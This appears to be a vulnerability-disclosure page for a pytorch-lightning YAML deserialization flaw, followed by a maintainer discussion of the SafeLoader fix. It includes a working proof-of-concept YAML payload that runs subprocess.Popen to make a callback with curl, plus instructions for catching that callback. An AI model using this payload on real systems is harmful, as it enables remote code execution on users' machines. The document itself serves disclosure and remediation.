Deserialization of Untrusted Data in pytorchlightning/pytorch-lightning

Valid

Reported on

Dec 12th 2021


Description

There is an untrusted YAML deserialization vulnerability in the PyTorchLightning GitHub repository. PyTorchLightning's saving.py (core.saving.load_hparams_from_yaml) calls "yaml.UnsafeLoader" from the pyyaml Python library, which is not a secure method. Because of that, a maliciously crafted YAML config file can cause code execution on the victim's machine.

Proof of Concept

  • Here is the poc.py file:
from pytorch_lightning import core
core.saving.load_hparams_from_yaml("evil.yaml")
  • Here is the evil.yaml file:
- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1:8080/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load
  • After that, you need to start an HTTP server on port 8080 of your attacker machine. When you run the command below, you will see the HTTP request from the victim host because of the malicious YAML file.
python3 -m http.server 8080
  • Run the poc.py file; after that, you will see the HTTP request coming from the victim host:
python3 poc.py

Impact

A maliciously crafted YAML config file can cause code execution on the victim's machine.

Occurrences

We are processing your report and will contact the pytorchlightning/pytorch-lightning team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Carlos Mocholí validated this vulnerability a year ago
oivrip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Carlos Mocholí
a year ago

Maintainer


As mentioned in the reference link, is the fix just updating https://github.com/PyTorchLightning/pytorch-lightning/blob/7aee00c679d64ed62c0e119415ac3e02a0e434fb/requirements.txt#L7 to >=5.3.1?

oivrip
a year ago

Researcher


Actually, I don't have very deep knowledge about the pyyaml library, but I would recommend you to update the library to the latest version rather than the 5.3.1 version because, as you can see from this link, it is said that there may be some problems in the 5.3.1 version. In addition, the use of UnsafeLoader may also open the door to different deserialization vulnerabilities in the future. For this reason, I can recommend you to examine other pyyaml loader functions such as FullLoader and SafeLoader. As the name suggests, if your application will not cause any incompatibility problems, using "yaml.SafeLoader" after updating the pyyaml library seems like the most guaranteed solution.

oivrip
a year ago

Researcher


Another reference about this subject: https://blog.ankursundara.com/pyyaml-cve/

Carlos Mocholí
a year ago

Maintainer


Okay, thank you! Do you want to open a PR so you get the fix bounty?

oivrip
a year ago

Researcher


Thank you for your offer! You can open a PR.

Carlos Mocholí marked this as fixed in 1.6 with commit 62f1e8 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
saving.py#L347 has been validated
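
As an added example (not part of the original report, the thread, or the pytorch-lightning code base), the sketch below shows the SafeLoader option raised in the discussion: plain hyperparameters load, while a document carrying a `python/*` tag is rejected before anything is constructed. The helper name `load_hparams_safely`, the `UntrustedHparamsError` class and both YAML strings are assumptions made for illustration; the tagged sample uses a harmless `os.getcwd` stand-in.

```python
# Added example, not pytorch-lightning code: hparams loading limited to SafeLoader.
import yaml  # PyYAML

# Constructed sample inputs.
PLAIN_HPARAMS = "learning_rate: 0.001\nbatch_size: 32\nlayers: [64, 64]\n"
# Harmless stand-in for a python/* tag; UnsafeLoader would call os.getcwd() here.
TAGGED_HPARAMS = "learning_rate: 0.001\ncwd: !!python/object/apply:os.getcwd []\n"


class UntrustedHparamsError(ValueError):
    """Raised when an hparams document needs more than plain YAML types."""


def load_hparams_safely(text):
    """Hypothetical loader: return a dict of plain values or raise."""
    try:
        data = yaml.load(text, Loader=yaml.SafeLoader)
    except yaml.constructor.ConstructorError as exc:
        # SafeLoader has no constructor for python/* tags, so loading stops
        # before any object is built or any callable is invoked.
        raise UntrustedHparamsError(f"rejected tag: {exc.problem}") from exc
    if data is None:  # empty file
        return {}
    if not isinstance(data, dict):
        raise UntrustedHparamsError("top-level YAML value must be a mapping")
    return data


def check(text):
    """Return ("ok", hparams) or ("rejected", reason) for one document."""
    try:
        return ("ok", load_hparams_safely(text))
    except UntrustedHparamsError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    for name, doc in (("plain", PLAIN_HPARAMS), ("tagged", TAGGED_HPARAMS)):
        print(name, check(doc))
```

SafeLoader also rejects benign Python-specific tags such as `!!python/tuple`, so hparams files that store such values have to be converted to plain YAML types first, which is the incompatibility the researcher's comment alludes to.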